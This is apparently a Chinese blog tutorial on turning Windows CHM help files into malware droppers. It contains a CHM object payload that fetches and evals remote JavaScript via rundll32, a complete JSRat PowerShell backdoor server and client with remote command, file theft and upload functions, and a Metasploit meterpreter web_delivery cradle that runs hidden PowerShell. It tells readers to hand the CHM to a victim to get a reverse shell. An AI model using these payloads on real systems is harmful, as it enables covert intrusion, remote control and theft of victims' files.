0x00简介
CHM是英语“Compiled Help Manual”的简写,即“已编译的帮助文件”。CHM是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。
0x01chm命令执行
14年的时候@ithurricanept 在twitter上发了一个demo,通过CHM运行计算器:
代码如下:
![](https://i-blog.csdnimg.cn/blog_migrate/8f900a89c6347c561fdf2122f13be562.gif)
![](https://i-blog.csdnimg.cn/blog_migrate/961ddebeb323a10fe0623af514929fc1.gif)
1 <!DOCTYPE html><html><head><title>cmd</title><head></head><body> 2 This is a demo ! <br> 3 <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> 4 <PARAM name="Command" value="ShortCut"> 5 <PARAM name="Button" value="Bitmap::shortcut"> 6 <PARAM name="Item1" value=',calc.exe'> 7 <PARAM name="Item2" value="273,1,1"> 8 </OBJECT> 9 <SCRIPT> 10 x.Click(); 11 </SCRIPT> 12 </body></html> 13
0x02实际利用
参考evi1cg的执行方法直接使用jsbackdoor代码如下
![](https://i-blog.csdnimg.cn/blog_migrate/8f900a89c6347c561fdf2122f13be562.gif)
![](https://i-blog.csdnimg.cn/blog_migrate/961ddebeb323a10fe0623af514929fc1.gif)
1 <!DOCTYPE html><html><head><title>powershell</title><head></head><body> 2 This is a demo ! <br> 3 <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> 4 <PARAM name="Command" value="ShortCut"> 5 <PARAM name="Button" value="Bitmap::shortcut"> 6 <PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.6.1/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'> 7 <PARAM name="Item2" value="273,1,1"> 8 </OBJECT> 9 <SCRIPT> 10 x.Click(); 11 </SCRIPT> 12 </body></html>
代码中的http://192.168.6.1需要修改成自己的ip,生成chm
下面执行jsbackdook监听80端口
![](https://i-blog.csdnimg.cn/blog_migrate/8f900a89c6347c561fdf2122f13be562.gif)
![](https://i-blog.csdnimg.cn/blog_migrate/961ddebeb323a10fe0623af514929fc1.gif)
1 <# 2 --- 3 Learn from Casey Smith @subTee 4 Author: 3gstudent 5 Version:1.2 6 Add code to work behind a proxy server. 7 --- 8 Javascript Backdoor 9 --- 10 Server: 11 run as admin: 12 powershell.exe -ExecutionPolicy Bypass -File c:\test\JSRat.ps1 13 14 Client: 15 cmd line: 16 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://192.168.1.14/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 17 #> 18 19 $Server = '192.168.6.1' #Listening IP. Change This. 20 21 function Receive-Request 22 { 23 param 24 ( 25 $Request 26 ) 27 $output = "" 28 $size = $Request.ContentLength64 + 1 29 $buffer = New-Object byte[] $size 30 do 31 { 32 $count = $Request.InputStream.Read($buffer, 0, $size) 33 $output += $Request.ContentEncoding.GetString($buffer, 0, $count) 34 } until($count -lt $size) 35 $Request.InputStream.Close() 36 write-host $output 37 } 38 39 $listener = New-Object System.Net.HttpListener 40 $listener.Prefixes.Add('http://+:80/') 41 42 netsh advfirewall firewall delete rule name="PoshRat 80" | Out-Null 43 netsh advfirewall firewall add rule name="PoshRat 80" dir=in action=allow protocol=TCP localport=80 | Out-Null 44 45 $listener.Start() 46 'Listening ...' 47 while ($true) 48 { 49 $context = $listener.GetContext() # blocks until request is received 50 $request = $context.Request 51 $response = $context.Response 52 $hostip = $request.RemoteEndPoint 53 54 #Use this for One-Liner Start 55 if ($request.Url -match '/connect$' -and ($request.HttpMethod -eq "GET")) 56 { 57 write-host "Usage:" -fore Green 58 write-host " cmd: just input the cmd command" -fore Green 59 write-host " delete file: input:delete,then set the file path" -fore Green 60 write-host " exitbackdoor: input:exit" -fore Green 61 write-host " read file: input:read,then set the file path" -fore Green 62 write-host " run exe: input:run,then set the file path" -fore Green 63 write-host " download file: input:download,then set the file path" -fore Green 64 write-host " upload file: input:upload,then set the file path" -fore Green 65 write-host "Host Connected" -fore Cyan 66 $message = ' 67 while(true) 68 { 69 h = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 70 h.SetTimeouts(0, 0, 0, 0); 71 72 try 73 { 74 h.Open("GET","http://'+$Server+'/rat",false); 75 h.Send(); 76 c = h.ResponseText; 77 78 79 if(c=="delete") 80 { 81 p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 82 p.SetTimeouts(0, 0, 0, 0); 83 p.Open("POST","http://'+$Server+'/rat",false); 84 p.Send("[Next Input should be the File to Delete]"); 85 g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 86 g.SetTimeouts(0, 0, 0, 0); 87 g.Open("GET","http://'+$Server+'/rat",false); 88 g.Send(); 89 d = g.ResponseText; 90 91 fso1=new ActiveXObject("Scripting.FileSystemObject"); 92 f =fso1.GetFile(d); 93 f.Delete(); 94 95 p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 96 p.SetTimeouts(0, 0, 0, 0); 97 p.Open("POST","http://'+$Server+'/rat",false); 98 p.Send("[Delete Success]"); 99 continue; 100 } 101 102 else if(c=="download") 103 { 104 p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 105 p.SetTimeouts(0, 0, 0, 0); 106 p.Open("POST","http://'+$Server+'/rat",false); 107 p.Send("[Next Input should be the File to download]"); 108 109 g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 110 g.SetTimeouts(0, 0, 0, 0); 111 g.Open("GET","http://'+$Server+'/rat",false); 112 g.Send(); 113 d = g.ResponseText; 114 115 fso1=new ActiveXObject("Scripting.FileSystemObject"); 116 f=fso1.OpenTextFile(d,1); 117 g=f.ReadAll(); 118 f.Close(); 119 120 p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 121 p.SetTimeouts(0, 0, 0, 0); 122 p.Open("POST","http://'+$Server+'/download",false); 123 p.Send(g); 124 continue; 125 } 126 127 else if(c=="exit") 128 { 129 c="(\"cmd /c taskkill /f /im rundll32.exe\",0,true)"; 130 r = new ActiveXObject("WScript.Shell").Run(c); 131 132 } 133 134 else if(c=="read") 135 { 136 p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 137 p.SetTimeouts(0, 0, 0, 0); 138 p.Open("POST","http://'+$Server+'/rat",false); 139 p.Send("[Next Input should be the File to Read]"); 140 141 g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 142 g.SetTimeouts(0, 0, 0, 0); 143 g.Open("GET","http://'+$Server+'/rat",false); 144 g.Send(); 145 d = g.ResponseText; 146 147 fso1=new ActiveXObject("Scripting.FileSystemObject"); 148 f=fso1.OpenTextFile(d,1); 149 g=f.ReadAll(); 150 f.Close(); 151 152 p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 153 p.SetTimeouts(0, 0, 0, 0); 154 p.Open("POST","http://'+$Server+'/rat",false); 155 p.Send(g); 156 continue; 157 } 158 159 160 else if(c=="run") 161 { 162 p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 163 p.SetTimeouts(0, 0, 0, 0); 164 p.Open("POST","http://'+$Server+'/rat",false); 165 p.Send("[Next Input should be the File to Run]"); 166 167 g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 168 g.SetTimeouts(0, 0, 0, 0); 169 g.Open("GET","http://'+$Server+'/rat",false); 170 g.Send(); 171 d = g.ResponseText; 172 173 r = new ActiveXObject("WScript.Shell").Run(d,0,true); 174 p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 175 p.SetTimeouts(0, 0, 0, 0); 176 p.Open("POST","http://'+$Server+'/rat",false); 177 p.Send("[Run Success]"); 178 179 continue; 180 } 181 182 183 else if(c=="upload") 184 { 185 p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 186 p.SetTimeouts(0, 0, 0, 0); 187 p.Open("POST","http://'+$Server+'/rat",false); 188 p.Send("[Start to Upload]"); 189 190 g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 191 g.SetTimeouts(0, 0, 0, 0); 192 g.Open("GET","http://'+$Server+'/uploadpath",false); 193 g.Send(); 194 dpath = g.ResponseText; 195 196 g2 = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 197 g2.SetTimeouts(0, 0, 0, 0); 198 g2.Open("GET","http://'+$Server+'/uploaddata",false); 199 g2.Send(); 200 ddata = g2.ResponseText; 201 202 fso1=new ActiveXObject("Scripting.FileSystemObject"); 203 f=fso1.CreateTextFile(dpath,true); 204 f.WriteLine(ddata); 205 f.Close(); 206 207 p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 208 p.SetTimeouts(0, 0, 0, 0); 209 p.Open("POST","http://'+$Server+'/rat",false); 210 p.Send("[Upload Success]"); 211 continue; 212 } 213 214 else 215 { 216 217 r = new ActiveXObject("WScript.Shell").Exec(c); 218 var so; 219 while(!r.StdOut.AtEndOfStream){so=r.StdOut.ReadAll()} 220 p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 221 p.Open("POST","http://'+$Server+'/rat",false); 222 p.Send(so); 223 } 224 225 } 226 catch(e1) 227 { 228 p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 229 p.SetTimeouts(0, 0, 0, 0); 230 p.Open("POST","http://'+$Server+'/rat",false); 231 p.Send("[No Output]"); 232 233 } 234 235 } 236 ' 237 238 } 239 240 if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "POST") ) 241 { 242 Receive-Request($request) 243 } 244 245 if ($request.Url -match '/download$' -and ($request.HttpMethod -eq "POST") ) 246 { 247 $output = "" 248 $size = $Request.ContentLength64 + 1 249 $buffer = New-Object byte[] $size 250 do { 251 $count = $Request.InputStream.Read($buffer, 0, $size) 252 $output += $Request.ContentEncoding.GetString($buffer, 0, $count) 253 } until($count -lt $size) 254 $Request.InputStream.Close() 255 256 write-host "Input the Path to Save:" -fore Red 257 $message = Read-Host 258 Set-Content $message -Value $output 259 write-host "Save Success" -fore Red 260 } 261 262 if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "GET")) 263 { 264 $response.ContentType = 'text/plain' 265 $message = Read-Host "JS $hostip>" 266 } 267 268 if($BoolExit -eq 1) 269 { 270 exit 271 } 272 $BoolExit=0 273 274 if($message -eq "exit") 275 { 276 $BoolExit=1 277 } 278 279 280 281 if ($request.Url -match '/uploadpath$' -and ($request.HttpMethod -eq "GET") ) 282 { 283 write-host "Input the Path to upload:" -fore Red 284 $UploadPath = Read-Host 285 write-host "Input the Destination Path:" -fore Red 286 $message = Read-Host 287 } 288 289 290 if ($request.Url -match '/uploaddata$' -and ($request.HttpMethod -eq "GET") ) 291 { 292 $message = Get-Content $UploadPath 293 } 294 295 [byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message) 296 $response.ContentLength64 = $buffer.length 297 $output = $response.OutputStream 298 $output.Write($buffer, 0, $buffer.length) 299 $output.Close() 300 301 } 302 303 $listener.Stop()
这里有个大坑$Server一定要改成自己的ip。我开始用的0.0.0.0会卡在”Host Connected”。
![](https://i-blog.csdnimg.cn/blog_migrate/8f900a89c6347c561fdf2122f13be562.gif)
![](https://i-blog.csdnimg.cn/blog_migrate/961ddebeb323a10fe0623af514929fc1.gif)
1 powershell.exe -ExecutionPolicy Bypass -File JSRat.ps1
然后直接把生成的chm给受害者就好了。受害者打开chm后就会反弹一个半交互的shell
根据evilcg提供的方法,测试发现确实只要用run执行就不会弹出一个框。
通过msf生成一个powershell的载荷
![](https://i-blog.csdnimg.cn/blog_migrate/8f900a89c6347c561fdf2122f13be562.gif)
![](https://i-blog.csdnimg.cn/blog_migrate/961ddebeb323a10fe0623af514929fc1.gif)
1 msf > use exploit/multi/script/web_delivery 2 msf exploit(web_delivery) > set target 2 3 msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp 4 msf exploit(web_delivery) > set uripath / 5 msf exploit(web_delivery) > set srvhost 192.168.6.134 //kali ip 6 msf exploit(web_delivery) > set lhost 192.168.6.134 //kali ip 7 msf exploit(web_delivery) > exploit 8 [*] Exploit running as background job. 9 10 [*] Started reverse TCP handler on 192.168.6.134:4444 11 [*] Using URL: http://192.168.6.134:8080/ 12 [*] Server started. 13 [*] Run the following command on the target machine: 14 powershell.exe -nop -w hidden -c $M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring('http://192.168.6.134:8080/');
我们需要把
![](https://i-blog.csdnimg.cn/blog_migrate/8f900a89c6347c561fdf2122f13be562.gif)
![](https://i-blog.csdnimg.cn/blog_migrate/961ddebeb323a10fe0623af514929fc1.gif)
1 $M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring('http://192.168.6.134:8080/');
转换成base64编码通过
cat power.txt | iconv --to-code UTF-16LE |base64
然后直接用run执行就可以了。全程无弹框
查看metasploit